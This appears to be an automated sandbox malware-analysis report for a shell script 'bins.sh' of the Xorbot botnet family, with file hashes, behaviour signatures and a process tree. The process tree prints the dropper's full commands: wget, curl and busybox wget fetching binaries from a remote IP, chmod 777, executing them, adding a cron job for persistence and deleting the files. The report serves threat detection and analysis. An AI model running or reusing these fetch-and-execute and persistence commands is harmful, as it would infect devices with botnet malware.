Analysis
-
max time kernel
149s -
max time network
158s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-12-2024 08:55
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
ef3b5b8d03ad9b64895750001a9a9f81
-
SHA1
67905e0b7ab0f9251c5591a53ab0efbfbe4aba7e
-
SHA256
cd567b9f3db24e8d535579d9dc2205d9730046834635074acae74277fe2460de
-
SHA512
d3430b5354703e133e906aa7f15d186f6c5d79914f465decabb603b16269e41a7ee63647e3209ecd66c7fd619266a50b6de934825d1cbc9becc66c20398c529f
-
SSDEEP
96:LVc68OcK8INtzVZ7Tjl9P3/Mwyq+zVc68OcK8INuFS0AVhX7DE7PneP3/Mw0q+s+:LxzVZvjl9P3/MwyjVc2P3/Mw6
Malware Config
Signatures
-
Processes:
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot behavioral2/files/fstream-6.dat family_xorbot -
Xorbot family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid Process 689 chmod 703 chmod -
Executes dropped EXE 2 IoCs
Processes:
OXVxT5hUBFD9egbouowK0UOvExtshC3jGjYgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6ioc pid Process /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj 690 OXVxT5hUBFD9egbouowK0UOvExtshC3jGj /tmp/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6 706 YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6 -
Renames itself 1 IoCs
Processes:
OXVxT5hUBFD9egbouowK0UOvExtshC3jGjpid Process 691 OXVxT5hUBFD9egbouowK0UOvExtshC3jGj -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.7yAWuu crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc Process File opened for reading /proc/cpuinfo curl -
Processes:
OXVxT5hUBFD9egbouowK0UOvExtshC3jGjcurlcrontabdescription ioc Process File opened for reading /proc/650/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/709/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/767/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/1/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/451/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/698/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/766/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/799/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/802/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/42/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/265/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/298/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/721/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/814/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/self/auxv curl File opened for reading /proc/747/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/803/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/23/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/796/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/21/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/307/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/741/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/100/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/141/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/657/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/722/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/751/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/13/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/19/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/78/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/724/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/763/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/770/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/797/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/filesystems crontab File opened for reading /proc/149/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/266/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/728/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/793/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/801/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/17/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/155/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/323/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/774/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/795/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/280/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/666/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/737/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/733/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/760/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/786/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/8/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/758/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/791/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/754/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/765/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/772/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/792/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/3/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/27/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/644/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/658/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/809/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj File opened for reading /proc/810/cmdline OXVxT5hUBFD9egbouowK0UOvExtshC3jGj -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxbusyboxwgetcurldescription ioc Process File opened for modification /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj busybox File opened for modification /tmp/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6 busybox File opened for modification /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj wget File opened for modification /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:658
-
/bin/rm/bin/rm bins.sh2⤵PID:662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj2⤵
- Writes file to tmp directory
PID:665
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj2⤵
- Writes file to tmp directory
PID:687
-
-
/bin/chmodchmod 777 OXVxT5hUBFD9egbouowK0UOvExtshC3jGj2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj./OXVxT5hUBFD9egbouowK0UOvExtshC3jGj2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:690 -
/bin/shsh -c "crontab -l"3⤵PID:692
-
/usr/bin/crontabcrontab -l4⤵PID:693
-
-
-
/bin/shsh -c "crontab -"3⤵PID:694
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:695
-
-
-
-
/bin/rmrm OXVxT5hUBFD9egbouowK0UOvExtshC3jGj2⤵PID:697
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G62⤵PID:700
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G62⤵PID:701
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G62⤵
- Writes file to tmp directory
PID:702
-
-
/bin/chmodchmod 777 YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G62⤵
- File and Directory Permissions Modification
PID:703
-
-
/tmp/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6./YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G62⤵
- Executes dropped EXE
PID:706
-
-
/bin/rmrm YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G62⤵PID:708
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/a0wubK2TzV0i7LK0iHvF93vpMmsRUZHzE92⤵PID:709
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD5bbbc4f15a2c110ddc72656ce1f4d9609
SHA18bafc9e8b75f9d98e7cbf8993ef8f9532c7410b5
SHA2566e92c9008fc5f4bd4db14914fe85c82feef5abce992396640a4cea621b2bd5e7
SHA5127f3af90986bb977bca6471e54a4b97e7ec9a06e6b5212bda65cae59aac8512475dfb1c65cb0e3c53a83c6b18e880f8c793a8b08871a998239c149b0d1d97a1c6